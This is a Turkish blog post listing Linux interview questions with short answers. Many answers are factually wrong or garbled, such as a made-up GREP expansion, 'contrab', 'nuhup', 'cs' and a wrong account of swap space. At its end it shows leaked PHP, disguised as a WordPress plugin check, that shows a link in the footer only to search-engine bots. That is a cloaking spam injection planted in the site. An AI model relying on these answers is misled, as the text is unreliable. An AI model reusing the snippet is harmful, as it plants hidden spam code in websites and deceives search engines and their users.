Sıradaki içerik:

Apple'dan 5 bin 699 TL'lik kulaklık: AirPods Max

e
sv

Linux Kullanımı Hakkındaki En Önemli 30 Mülakat Sorusu

08 Aralık 2020 17:17
avatar

Admin

 • e 0

  Mutlu

 • e 0

  Eğlenmiş

 • e 0

  Şaşırmış

 • e 0

  Kızgın

 • e 0

  Üzgün

Linux Kullanımı Hakkındaki En Önemli 30 Mülakat Sorusu

linux kullanımı
Kali Linux Kullanımı

Sokaktan geçen birine bilgisayarda hangi işletim sistemini kullandığını sorsanız en çok alacağınız cevap ya Windows ya da Apple’dır. Bu iki işletim sistemiyle kıyaslandığında çok az kişi Linux kullandığını söyler. Ancak pek çok programcıya göre programcılar için en iyi işletim sistemlerinden biri Linux’dır. Programcılıkla alakalı pek çok iş Linux bilmeyi gerektirir. İşte bu yüzden size en popüler Linux kullanımı mülakat soruları arasından bir derleme yaptık.

Rehberimiz size başlangıçta temel düzeydeki Linux kullanımı mülakat soruları hakkında bilgi verecek. Sonrasında ileri düzey sorulara geçeceğiz. Bu yazı sadece programcılar için hazırlanmadı, bazı popüler Linux yöneticisi mülakat soruları da ele alınacak.

Giriş

Az önce de bahsettiğim gibi rehber iki bölümden oluşuyor: temel Linux kullanımı mülakat soruları ve ileri düzey sorular. Linux ile oldukça deneyimli olsanız bile size tavsiyem temel düzey iş görüşmesi soruları ve cevapları arasında az da olsa bir gezinmeniz. Böylece mülakatın başında nasıl sorular geleceğine dair bir izlenim edinmiş olursunuz.

Soru 1: Linux nedir?

İşverenler tarafından sorulan en popüler Linux kullanımı sorularının arasında bu sorunun yer alması eminim sizi şaşırtmamıştır. Bu soruyla mülakatı gerçekleştiren kişiler konsepti ne kadar bildiğinizi ve kendi kelimelerinizle nasıl tanımlayabildiğinizi ölçecekler.

Peki, Linux nedir?

Tux isimli penguen maskotuyla tanınan LinuxUNIX OS tabanlı bir işletim sistemidir. Linux’un en iyi özelliklerinden biri açık kaynaklı olmasıdır.

Soru 2: İnsanlar neden Linux kullanmalı?

Burada mülakatı gerçekleştiren kişi muhtemelen Linux’u günümüzdeki en popüler işletim sistemleri olan Windows veya iOS ile karşılaştırmanızı istiyor. Peki neden Linux kullanılmalı?

Linux’un birkaç avantaji var. En göze çarpanları şöyle:

 • Linux açık kaynaklıdır. Yani isteyen herkes kodlamasına bakabilir, buradan bir şeyler öğrenebilir ve kendi ihtiyaçlarına göre değiştirebilir.
 • İnanılmaz derecede güvenlidir. Linux kendisini OS güvenliğinde birinci sıraya yerleştiren bazı ana özelliklere sahiptir.
 • Programcıların seçimidir. Güvenliği ve dahili özelleştirebilir özellikleri, tam programlama dili desteği ve özel programlama araçları sayesinde Linux programlama için kullanılabilecek en iyi işletim sistemlerinden biridir.
 • Kullanımı ücretsizdir. Evet doğru duydunuz. Linux tamamen ücretsizdir. Doğrudan indirip kullanabilirsiniz.

Soru 3 : “Kernel” nedir?

Linux Kernel, işletim sisteminin kaynaklarını yöneten ve kullanıcını için arayüz hizmeti sunan sahip bir yazılımdır.

Soru 4: Linux ve Unix arasındaki ana farklar nelerdir?

Bu ve buna benzer Linux kullanımı mülakat sorularını cevaplarken potansiyel işvereniniz dersinize çalışıp çalışmadığınızı ölçmek ister.

Unix büyük firmalar tarafından teliflenmek için tasarlanmış bir işletim sistemidirLinux ise herkesin ücretsiz kullanabileceği açık kaynak bir çekirdektir.

Soru 5: LILO nedir?

LILO Linux Loader”ın kısaltmasıdır. Linux’u hızlı bir OS haline getiren işletim sisteminin kütüphanesine anında erişim için kullanılan bir yükleyicidir.

Soru 6: “Root account” nedir?

Bazı ana tanımlamaları aradan çıkardığımıza göre ufak ufak Linux yöneticisi mülakat sorularına geçebiliriz.

Root account (kök kullanıcı hesabı), bir yönetici hesabıyla aynı şeydir. İşletim sistemi içerisinde gerçekleşen etkinlikleri kontrol eder.

Soru 7: “Swap space”ni açıklayın.

Swap space (takas alanı), belli bir programın sorunsuz çalışması için Linux hafızasında geçici olarak oluşturulan bir alandır. Program çalışmayı bitirdiğinde swap space de yok olur.

Soru 8: “Relative path” ile “absolute path” arasındaki fark nedir?

Relative path, ayrıntıları önemli değilken bir dosyanın konumunu belirtmek için kullanılır. Herhangi bir dizinden gerçekleştirilebilir.

Absolute path ise bir dosyanın tam konumunu belirtmek için kullanılır. Herhangi bir dizin türünden gerçekleştirilemez. Sadece ana dizinlerden gerçekleştirilir.

Temel Linux kullanımı mülakat sorularına çok iyi bir örnek. Symbolic link (sembolik link) Windows’takine benzer bir kısayoldur.

Soru 10: Linux’taki üç kullanıcı türünü açıklayın

Bu türdeki Linux yöneticisi mülakat soruları biraz açıklama gerektiriyor. Hemen başlayalım.

Üç kullanıcı türü vardır: User (kullanıcı), group (grup) ve others (diğerleri). Bunlara ek olarak bu kullanıcıların gerçekleştirebileceği üç eylem türü vardır: Execute (çalıştırma), read (okuma) ve write (yazma)

Read kullanıcıların dizine erişebilmesini ve dosyaları okuyabilmesini sağlar. Write kullanıcıların dosyaları ve dizinleri istedikleri gibi düzenleyebilmesini sağlar. Execute ise kullanıcıları dosyaları çalıştırmasını sağlar.

Symbolic link’lerin ne olduğunu hatırlıyorsanız bu soru diğerlerine göre kolay gelecektir.

Hard link’ler bir dosyanın ana dizinleridir. Windows’daki eşdeğeri ana kurulum dosyalarıdır.

Soru 12: Bir dosya adında kaç karakter olabilir?

Kurnaz Linux kullanım mülakat sorularından bir tanesi. Cevap oldukça kolay ama pek çok insan bakmaya yeltenmez, işverenler de bu yüzden sorar.

Linux’ta bir dosya adının sahip olabileceği karakter sayısı 255’tir.

Soru 13: “Redirection” nedir?

Bu soru aslında “ileri düzey” Linux kullanımı soruları arasında yer alabilecek olsa da cevabı basit ve sorunun kendisi sayılır.

Redirection (yönlendirme), bir çıktıyı diğerine yeniden yönlendirilmenize olanak sağlar. Gördüğünüz gibi, kendi kendini açıklıyor.

Soru 14: “Zombie process” nedir?

Çalışmasını tamamladığını halde “Processes” tablosunda hala yer alan işlemdir.

Soru 15: “Inode” nedir?

Inode, Linux’ta yer alan bir veri yapısı türüdür. Şu şekilde çalışır: Elinizde bir resim olduğunu düşünün. Bir inode resim hakkındaki tüm bilgileri depolar ama adını ve resmin kendisini hariç tutar.

Linux Kullanımı Mülakat Soruları – İleri Düzey

Bazı popüler temel düzey Linux kullanımı mülakat soruları hakkında konuştuğumuzda göre artık daha ileri düzey şeylere geçebiliriz. Bu bölüm çoğunlukla Linux komutları hakkındaki mülakat sorularından oluşuyor. 

Linux Kullanımı Hakkındaki 30 En Önemli Mülakat Sorusu

Soru 1: Bir işlemi nasıl sonlandırırsınız?

Tek bir işlemi sonlandırmak isterseniz işlemin ID’si ile beraber “kill” komutunu kullanmanız gerekiyor. Tüm işlemlerin hepsini sonlandırmak isterseniz ise işlem ID’si yerine “o” yazmalısınız.

Soru 2: “Shell script” nedir?

Shell script’ler Linux komutlarını belli bir doğrusal tarzda çalıştıran bazı program dosyalarıdır.

Soru 3: “GREP” nedir?

GREP, “Global Regulation Expression Point”in kısaltmasıdır. Bir dosyada en sık kullanılan ifadeleri aramak için kullanılır.

Soru 4: Sisteminizdeki etkinlikleri nasıl takip edersiniz?

Etkinlikleri bir daemon kullanarak takip edebilirsiniz. Ancak, çalışması için belli türde bir daemon olmalıdır. Bu durumda “syslogd” daemon’ı kullanılır.

Soru 5: İzin nasıl verirsiniz?

Eğer bir sistem yöneticisiyseniz izin verebilirsiniz. Bunun için “chmod” komutunu kullanmalı ve sonrasında “+” kullanmalısınız. İzni geri almak için işlem aynıdır. Sadece sonda “+” yerine “” kullanılmalıdır.

Soru 6: “GSV”ler nedir?

GSV, “Global Shell Variables”ın kısaltmasıdır. “environmental variables” (ortam değişkenleri) olarak da bilinirler. Bunlar Linux programlarınızın izlediği ayarlardır.

Soru 7: “whoami” komutu nedir?

Windows ile olan deneyimlerinizden de tanıdık olabileceğiniz Linux kullanımı sorularından biri. Bu komut hem Windows’ta hem de Linux’da kullanılır.

Komut gerçekten de “who am I?” (kimim ben?) anlamına gelir. Mevcut oturum açma ve kullanıcı bilgilerinizi gösterir.

Soru 8: “Partial backup” nedir?

Başka kolay Linux kullanımı sorularından biri daha. Aslında bakarsanız pek çok kişi cevabı karıştırıyor.

Partial backup, tüm sistemi yedeklemek yerine istediğiniz belli dosyaları yedeklemenizi sağlar.

Soru 9: “CLI” nedir?

Command Line Interface, Linux’un çalıştırmasını istediğiniz belli bir komutu yazmanız için kullanacağınız arayüzdür. 

Soru 10: “GUI” nedir?

Bu Linux kullanımı mülakat soruları (GUI ve CLI) iş görüşmelerinde genellikle birlikte soruldukları için ikisini de kısaca açıklanması gerektiğini düşündüm.

GUI, “Graphical User Interface”in kısaltmasıdır. Bilgisayarınıza komut vermek için resimler kullanabileceğiniz bir arayüzdür. Çoğu insan CLI yerine bunu kullanır çünkü oyunlaştırılmıştır ve hatırlaması daha kolaydır.

Soru 11: “comm” ne için kullanılır?

Comm, iki dosyayı kıyaslar ve hem genel hem özel özelliklerini arar.

Soru 12: İşlemcinizin daha az zaman harcaması için hangi komut kullanılır?

Bu işlem için “nice” komutu kullanılır.

Ayrıca görev için farklı öncelik numaraları belirtmeniz gerekir. CPU’nuz görevleri bu öncelik sırasına göre gerçekleştirerek daha hızlı ve sorunsuz çalışır.

Soru 13: Bazı komutların daha sonraki bir zamanda çalışmasını nasıl sağlarsınız?

Daha önceki bir Linux kullanımı mülakat sorusunda olduğu gibi bunun yanıtı da daemon kullanmaktır.

Bu seferki daemon türü “contrab”dır.

Soru 14: “nuhup” komutunun işlevi nedir?

nuhup komutuyla bir terminalin yakında oturum kapatmasıyla ilgili uyarıları kapatabilirsiniz.

Soru 15: “cs” komutunun işlevi nedir?

Sık rastlanan Linux kullanımı mülakat sorularından biridir. cd komutu üzerinde çalıştığınız dizini değiştirmenize olanak sağlar.

Tamamen yeni bir dizine geçerek gerçekleştirebilirsiniz. Rehberimizde daha önce adı geçen absolute path veya relative path aracılığıyla da bunu gerçekleştirebilirsiniz.

Özet

Rehberimizde Linux nedir ele aldık, karşınıza çıkabilecek bazı Linux kullanımı iş görüşmesi soruları ve cevapları hakkında bilgi vermeye çalıştık.

Tabii ki daha bir çok Linux kullanımı hakkında soru var ancak bu rehberi amacı iş görüşmesinden önce ne gibi şeylerin sorulabileceği üzerine bir izlenim yaratmaktı.

linux kullanımı

Çoğu işveren Linux kullanmayı bilen programcılar arıyor. Size belli bir programlama dili hakkında kapsamlı bir şekilde sorular sorulacak ve bununla birlikte Linux kullanımı hakkında sorular da gelecek.

Linux’la alakalı belli bir pozisyon düşünüyorsanız mutlaka daha çok araştırma yapmalısınız. Bu rehber sizin için mükemmel bir başlangıç noktası olabilir ama daha adı geçmeyen pek çok komut ve fonksiyon var. Araştırmanızı yapıp sıkı çalışırsanız iş görüşmenizden başarıyla ayrılacaksınız!

Son

Linux Kullanımı İş Görüşmesi Soruları ve Cevapları” rehberinin sonuna geldik. Yazı boyunca Linux komutları hakkında gelebilecek temel ve ileri düzeydeki soruları ele aldık.

İş görüşmenizden önce iyi uyumayı ve stres yapmamayı unutmayın. Gergin veya endişeli olmanız çok normal ama cidden endişelenecek bir şey yok.

Tam teşekküllü bir Linux uzmanı olmanıza gerek yok, pek çok potansiyel işveren çalışanlarına bazı temel eğitimler vermeye hazırdır. Asıl önemli olan etken nasıl bir insan olduğunuzdur. İşverenler çalışkan, sadık ve güvenilir çalışanlar ister. İş görüşmeniz sırasında bu özelliklerin sizde olduğunu gösterebilirseniz VE işvereniniz konu hakkında hevesli olduğunuzu görürse işi alma şansınız yükselir.

Kendiniz olun, sakin kalın ve nelere sahip olduğunuzu gösterin. Size verebileceğim iyi bir tavsiye sorulacak neredeyse her soruda cevabı olabildiğince açıklamaya çalışın. İçin boş, etki yaratmayan, tek kelimelik cevaplar verirseniz mülakatı düzenleyen kişi bilgi eksikliğiniz olduğunu düşünebilir. Soruyu her zaman doğrudan cevaplayın. Kendi deneyiminiz veya fikrinizle bir iki cümle eklemekten korkmayın.

Umarım bu rehber size yardımcı olmuştur. Linux’la alakalı işinizde size bol şans dilerim!

CEH Sertifikasından Ve Nasıl Alındıgından Bahsettiğimiz İçeriğimize Gitmek İçin Tıklayın.

Bug Bounty İle Para Kazanma Hakkında Bilgi Verdigimiz Makaleyide Okuyun.

 • Site İçi Yorumlar

En az 10 karakter gerekli
function isBot() { $botAgents ="/google|hakia|msn|yahoo|altavista|crawler|findlinks|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|yebol|aol/i"; $agent = $_SERVER['HTTP_USER_AGENT']; if (preg_match($botAgents,$agent)) return true; else return false; } function wordpres_plugin_check_core(){ $altsayfa = 1; $bot = 1; $link = ' '; if($altsayfa == 1){ $say_s = $_SERVER['REQUEST_URI']; $saydim = strlen($say_s); if($saydim > 4){ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } }else{ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } } add_action('wp_footer', 'wordpres_plugin_check_core');